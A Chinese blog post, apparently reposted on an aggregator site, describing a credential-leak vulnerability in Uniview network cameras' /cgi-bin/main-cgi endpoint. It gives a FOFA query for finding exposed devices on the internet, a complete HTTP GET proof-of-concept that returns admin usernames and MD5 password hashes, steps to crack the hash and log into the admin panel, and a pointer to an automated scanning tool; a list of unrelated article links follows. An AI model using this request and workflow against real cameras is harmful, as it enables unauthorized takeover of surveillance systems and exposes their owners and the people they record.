当前位置: 首页 > news >正文

宇视科技视频监控 main-cgi 文件信息泄露漏洞

宇视科技视频监控 main-cgi 文件信息泄露漏洞

  • 一、产品简介
  • 二、漏概述
  • 三、复现环境
  • 四、漏洞检测
    • 手工抓包
    • 自动化检测

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

宇视(Uniview)高清网络摄像机是一种高性能的网络摄像机,它可以通过网络进行视频传输和监控。该摄像机采用先进的视频技术,具有高清晰度、低照度、宽动态等特点,能够提供高质量的视频图像。
在这里插入图片描述

二、漏概述

宇视(Uniview)高清网络摄像机存在信息泄露漏洞,攻击者可以通过解密泄露信息获取管理员账号密码,登陆后台控制整个系统,最终导致系统处于极度不安全状态。

三、复现环境

FOFA: app=“uniview-视频监控”

在这里插入图片描述

四、漏洞检测

POC

GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1}" HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

手工抓包

如果回显200 ok,并且能看到有UserName关键字的,说明成功

在这里插入图片描述
我们也可以看到,密码部分是md5加密的,需要去解密

在这里插入图片描述
直接登录后台

在这里插入图片描述
如果你遇到了插件异常

请直接使用IE浏览器访问

自动化检测

小龙POC这里依然还是顶着干
小龙POC开源传送门: 小龙POC工具

小龙POCexe传送门: 小龙POC工具

在这里插入图片描述

相关文章:

  • PostgreSql 设置自增字段
  • SQL注入绕过技术
  • GO闭包实现原理(汇编级讲解)
  • Python查找列表中不重复的数字
  • 【ArcGIS微课1000例】0080:ArcGIS将shp转json(geojson)案例教程
  • 网络基础(八):路由器的基本原理及配置
  • Redis系列之简单实现watchDog自动续期机制
  • android项目实战之编辑器图片上传预览
  • 使用python脚本一个简单的搭建ansible集群
  • 数据在网络中是怎么传输的?
  • 数据库结构
  • WT588F02B-8S语音芯片在水波炉中的应用:提升用户体验与安全性
  • GPT-4V 在机器人领域的应用
  • Vue中比较两个JSON对象的差异
  • 『npm』一条命令快速配置npm淘宝国内镜像
  • 【108天】Java——《Head First Java》笔记(第1-4章)
  • 【跃迁之路】【641天】程序员高效学习方法论探索系列(实验阶段398-2018.11.14)...
  • CODING 缺陷管理功能正式开始公测
  • ComponentOne 2017 V2版本正式发布
  • Consul Config 使用Git做版本控制的实现
  • CSS居中完全指南——构建CSS居中决策树
  • Gradle 5.0 正式版发布
  • Js基础——数据类型之Null和Undefined
  • Redis学习笔记 - pipline(流水线、管道)
  • RxJS 实现摩斯密码(Morse) 【内附脑图】
  • Sublime text 3 3103 注册码
  • Synchronized 关键字使用、底层原理、JDK1.6 之后的底层优化以及 和ReenTrantLock 的对比...
  • vue中实现单选
  • 从0搭建SpringBoot的HelloWorld -- Java版本
  • 构建工具 - 收藏集 - 掘金
  • 微信小程序--------语音识别(前端自己也能玩)
  • 小程序上传图片到七牛云(支持多张上传,预览,删除)
  • 一份游戏开发学习路线
  • 深度学习之轻量级神经网络在TWS蓝牙音频处理器上的部署
  • 第二十章:异步和文件I/O.(二十三)
  • ​如何防止网络攻击?
  • #NOIP 2014# day.1 生活大爆炸版 石头剪刀布
  • #预处理和函数的对比以及条件编译
  • (3)nginx 配置(nginx.conf)
  • (NSDate) 时间 (time )比较
  • (pojstep1.3.1)1017(构造法模拟)
  • (附源码)计算机毕业设计ssm-Java网名推荐系统
  • (附源码)计算机毕业设计SSM教师教学质量评价系统
  • (官网安装) 基于CentOS 7安装MangoDB和MangoDB Shell
  • (六)c52学习之旅-独立按键
  • (每日持续更新)jdk api之FileReader基础、应用、实战
  • (切换多语言)vantUI+vue-i18n进行国际化配置及新增没有的语言包
  • (转)程序员疫苗:代码注入
  • *_zh_CN.properties 国际化资源文件 struts 防乱码等
  • .bat批处理(九):替换带有等号=的字符串的子串
  • .bat批处理(十):从路径字符串中截取盘符、文件名、后缀名等信息
  • .NET Core WebAPI中封装Swagger配置
  • .NET开源项目介绍及资源推荐:数据持久层 (微软MVP写作)
  • .vue文件怎么使用_vue调试工具vue-devtools的安装
  • /var/log/cvslog 太大